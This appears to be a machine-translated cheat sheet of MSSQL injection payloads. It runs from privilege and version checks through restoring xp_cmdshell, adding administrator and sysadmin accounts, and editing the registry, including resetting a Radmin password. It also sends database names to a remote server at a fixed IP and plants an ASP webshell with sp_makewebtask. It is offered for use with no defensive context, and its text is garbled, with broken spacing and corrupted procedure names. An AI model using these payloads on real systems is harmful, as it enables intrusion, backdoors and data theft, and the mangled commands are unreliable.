// Check the permissions.
And 1 = (select is_member ('db _ owner '))
And char (124) % 2 bcast (is_member ('db _ owner') as varchar (1) % 2 bchar (124) = 1 ;--
// Check whether the current login has permission to read a database
And 1 = (select has_dbaccess ('master '))
And char (124) % 2 bcast (has_dbaccess ('master') as varchar (1) % 2 bchar (124) = 1 --
Numeric type
And char (124) % 2 Buser % 2 bchar (124) = 0
Character Type
'And char (124) % 2 Buser % 2 bchar (124) = 0 and ''='
Search type
'And char (124) % 2 Buser % 2 bchar (124) = 0 and' % '='
Brute-force Username
And user> 0
'And user> 0 and ''='
Check whether the current login holds the sysadmin (sa) role
And 1 = (select is_srvrolemember ('sysadmin '));--
And char (124) % 2 bcast (is_srvrolemember (0x730079007300610064006d0069006e00) as varchar (1) % 2 bchar (124) = 1 --
Check whether the back-end database is MSSQL
And exists (select * From sysobjects );--
Check whether multiple rows are supported
; Declare @ d int ;--
Restore xp_mongoshell
; Exec master .. DBO. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--
Select * From OpenRowSet ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; Pwd = pafsp', 'select @ version ')
//-----------------------
// Execute the command
//-----------------------
First, enable the sandbox mode:
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ engines', 'sandboxmode', 'reg _ dword', 1
Then run the system command using jet. oledb.
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ IAS. MDB ', 'select shell ("cmd.exe/C net user admin admin1234/Add ")')
Execute Command
; Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net user PAF pafpaf/add ';--
Exec [Master]. [DBO]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'
Determine whether the xp_mongoshell extended stored procedure exists:
Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')
Write registry
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ engines', 'sandboxmode', 'reg _ dword', 1
REG_SZ
Read Registry
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'
Read directory contents
Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1
Database Backup
Backup database pubs to disk = 'C: \ 123. Bak'
// Burst length
And (select char (124) % 2 bcast (count (1) as varchar (8000) % 2 bchar (124) from d99_tmp) = 0 ;--
To change the SA password, run the following command:
Exec sp_password null, 'new password', 'sa'
Test:
Exec master. DBO. sp_addlogin test, ptlove
Exec master. DBO. SP_ADDSRVROLEMEMBER test, SysAdmin
Drop the xp_mongoshell extended stored procedure:
Exec sp_dropextendedproc 'xp _ export shell'
Add an extended stored procedure
Exec [Master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'
Grant exec on xp_proxiedadata to public
Stop or start a service.
Exec master.. xp_servicecontrol 'stop', 'schedule'
Exec master.. xp_servicecontrol 'start', 'schedule'
DBO. xp_subdirs
Lists only the subdirectories of a directory.
Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ sqlinject \ login. asp'
DBO. xp_makecab
Compresses multiple files into a single target file.
All files to be compressed are appended to the end of the parameter list, separated by commas.
DBO. xp_makecab
'C: \ test. cab', 'mszip ', 1,
'C: \ Inetpub \ wwwroot \ sqlinject \ login. asp ',
'C: \ Inetpub \ wwwroot \ sqlinject \ securelogin. asp'
Xp_terminate_process
Stops a running program; the parameter is the process ID.
Select "View" > "Select Columns" in Task Manager to view the process ID of each running program.
Xp_terminate_process 2484
Xp_unpackcab
Decompresses the file.
Xp_unpackcab 'C: \ test. cab', 'c: \ Temp ', 1
A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed. net.exe does not exist. There is no way to use Regedit/E to import the registration file, but MSSQL is the SA permission. Run the following command to Exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ Radmin \ V2.0 \ Server \ Parameters', 'parameter ', 'reg _ binary', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ Radmin \ V2.0 \ Server \ Parameters', 'Port', 'reg _ binary ', and 0xd20400 change port value to 1234
Create Database LCX;
Create Table Ku (name nvarchar (256) null );
Create Table Biao (ID int null, name nvarchar (256) null );
// Obtain the database names
Insert into OpenDataSource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; Pwd = pafpaf; database = lcx '). LCX. DBO. ku select name from master. DBO. sysdatabases
// Create a table in master to check permissions
Create Table master .. d_test (ID nvarchar (4000) null, data nvarchar (4000) null );--
Use sp_makewebtask to directly write a sentence in the web directory:
Http: // 127.0.0.1/dblogin123.asp? Username = 123 '; Exec % 20sp_makewebtask % 20 'd: \ www \ TT \ 88. ASP ',' % 20 select % 20 ''<% 25 execute (Request (" A ") % 25>'' % 20 ';--
// Update table content
Update films set kind = 'dramatic 'Where id = 123
// Delete content
Delete from table_name where stockid = 3